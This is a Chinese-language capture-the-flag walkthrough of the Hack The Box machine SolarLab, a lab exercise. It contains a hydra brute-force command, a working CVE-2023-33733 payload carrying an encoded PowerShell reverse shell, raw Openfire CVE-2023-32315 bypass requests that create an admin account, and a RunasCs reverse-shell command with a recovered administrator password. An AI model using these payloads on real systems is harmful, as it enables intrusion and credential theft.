Hack The Box的windows靶机,官方评定难度为Medium,涉及445端口利用、WEB密码爆破、CVE-2023-33733、CVE-2023-32315等技术,总的来说是台质量还不错的Windows靶机。废话不多说,直接开干。

信息收集

端口扫描

目标开放80,135,139,445,6791端口,并扫描到域名report.solarlab.htb:6791和solarlab.htb,把这些域名全部添加到host文件

445端口利用

看到开放了445端口,尝试一下smb匿名登录

发现目标可以利用smb匿名访问,接着查看一下Documents文件夹

利用get命令把里面的文件下载到本地查看,发现details-file.xlsx文件中存在账号密码,先保存下来备用

WEB端口利用

看完了445端口,再看一下开放web的80端口和6791端口

打开80端口对应web网页,暂时没发现可利用的点,先放一放

打开6791端口对应web页面,发现一个登录页面

刚刚正好收集到账号密码爆破一下试试

1
hydra -L user.txt -P passwd.txt report.solarlab.htb -s 6791 http-post-form "/login:username=^USER^&password=^PASS^:#ff1919"

爆破失败了,查看收集到的用户名,看到Claudia后缀有个s,Alexander后缀有个k,那么blake.byte应该也有一个blakeb,添加入user.txt继续尝试爆破

成功爆破出账号密码:blakeb:ThisCanB3typedeasily1@,将这个收集到的账号密码添加到密码本备用

WEB渗透

利用爆破出来的blakeb:ThisCanB3typedeasily1@登录6791端口网页

登录进来之后有四个功能点,每个功能都不太一样

CVE-2023-33733

网上搜索一下reportHub的历史漏洞,找到CVE-2023-33733:https://github.com/c53elyas/CVE-2023-33733

1
2
3
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('touch /tmp/exploited') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">
                exploit
</font></para>

将可用于Windows的反弹shell编码替换之前的touch命令即可,创建的时候一定要选择签名才会生效

完整poc:

1
2
3
4
5
<para><font color="[[[getattr(pow, Word('__globals__'))['os'].system('powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANgA2ACIALAAxADIAMwA0ACkAOwAkAHMAdAByAGUAYQBtACAAPQAgACQAYwBsAGkAZQBuAHQALgBHAGUAdABTAHQAcgBlAGEAbQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AJABiAHkAdABlAHMAIAA9ACAAMAAuAC4ANgA1ADUAMwA1AHwAJQB7ADAAfQA7AHcAaABpAGwAZQAoACgAJABpACAAPQAgACQAcwB0AHIAZQBhAG0ALgBSAGUAYQBkACgAJABiAHkAdABlAHMALAAgADAALAAgACQAYgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAKQApACAALQBuAGUAIAAwACkAewA7ACQAZABhAHQAYQAgAD0AIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEEAUwBDAEkASQBFAG4AYwBvAGQAaQBuAGcAKQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABiAHkAdABlAHMALAAwACwAIAAkAGkAKQA7ACQAcwBlAG4AZABiAGEAYwBrACAAPQAgACgAaQBlAHgAIAAkAGQAYQB0AGEAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcAIAApADsAJABzAGUAbgBkAGIAYQBjAGsAMgAgAD0AIAAkAHMAZQBuAGQAYgBhAGMAawAgACsAIAAiAFAAUwAgACIAIAArACAAKABwAHcAZAApAC4AUABhAHQAaAAgACsAIAAiAD4AIAAiADsAJABzAGUAbgBkAGIAeQB0AGUAIAA9ACAAKABbAHQAZQB4AHQALgBlAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkALgBHAGUAdABCAHkAdABlAHMAKAAkAHMAZQBuAGQAYgBhAGMAawAyACkAOwAkAHMAdAByAGUAYQBtAC4AVwByAGkAdABlACgAJABzAGUAbgBkAGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA==') for Word in [ orgTypeFun( 'Word', (str,), { 'mutated': 1, 'startswith': lambda self, x: 1 == 0, '__eq__': lambda self, x: self.mutate() and self.mutated < 0 and str(self) == x, 'mutate': lambda self: { setattr(self, 'mutated', self.mutated - 1) }, '__hash__': lambda self: hash(str(self)), }, ) ] ] for orgTypeFun in [type(type(1))] for none in [[].append(1)]]] and 'red'">

                exploit

</font></para>

成功反弹shell

User flag

成功拿到user flag

内网渗透

端口转发

拿到靶机立足点后,查看靶机监听的端口,看到有9090和9091端口,和之前打的jab靶机端口很相似,准备代理出来看看

先在本机上起一个http服务,把chisel传到靶机上

利用chisel做个代理

1
2
服务端:./chisel server -p 6666 --reverse
客户端:./chisel.exe client 10.10.14.66:6666 R:9090:127.0.0.1:9090

成功代理,访问本地9090端口即可访问到靶机的9090端口

CVE-2023-32315

转发出来可以看到是Openfire 4.7.4,那么利用方式和之前的HTB-Jab靶机应该是一样的,不过这次没有或得登录凭据,但是好在可以存在未授权登录

CVE-2023-32315:https://github.com/tangxiaofeng7/CVE-2023-32315-Openfire-Bypass

先获得 JSESSIONID 和 csrftoken

1
2
3
4
5
6
7
8
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp HTTP/1.1
Host: 127.0.0.1:9090
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
Content-Length: 0

得到了JSESSIONID和csrf

1
2
JSESSIONID=node013h0l9ukcoeaw1163xaatfgvb35.node0
csrf=OBwT92asQjLPqBJ

再构建用户

1
2
3
4
5
6
7
8
GET /setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf=OBwT92asQjLPqBJ&username=test&name=&email=&password=test&passwordConfirm=test&isadmin=on&create=Create+User HTTP/1.1
Host: your-ip
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Cookie: JSESSIONID=node013h0l9ukcoeaw1163xaatfgvb35.node0; csrf=OBwT92asQjLPqBJ
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0

利用创建的用户test/test成功登录后台

接着就是上传插件的jar包,反弹shell

在Server->Server Settings处访问上传的shell

输入密码123访问shel

选择系统命令来反弹一个shell

提权

反弹shell成功,不过与jab相比,这次不是系统权限,需要提权操作

反弹一个新的权限的shell,进去翻看一下目录,发现了openfire.script,这个文件为openfire的数据库脚本文件,查看可以发现有administrator的加密凭证

可以利用openfire的解密工具进行解密:https://github.com/c0rdis/openfire_decrypt

获得秘钥ThisPasswordShouldDo!@

上传RunasCs(https://github.com/antonioCoco/RunasCs

利用RunasCs反弹一个shell

1
./RunasCs.exe administrator ThisPasswordShouldDo!@ powershell -r 10.10.14.66:3333

ROOT Flag

获得root flag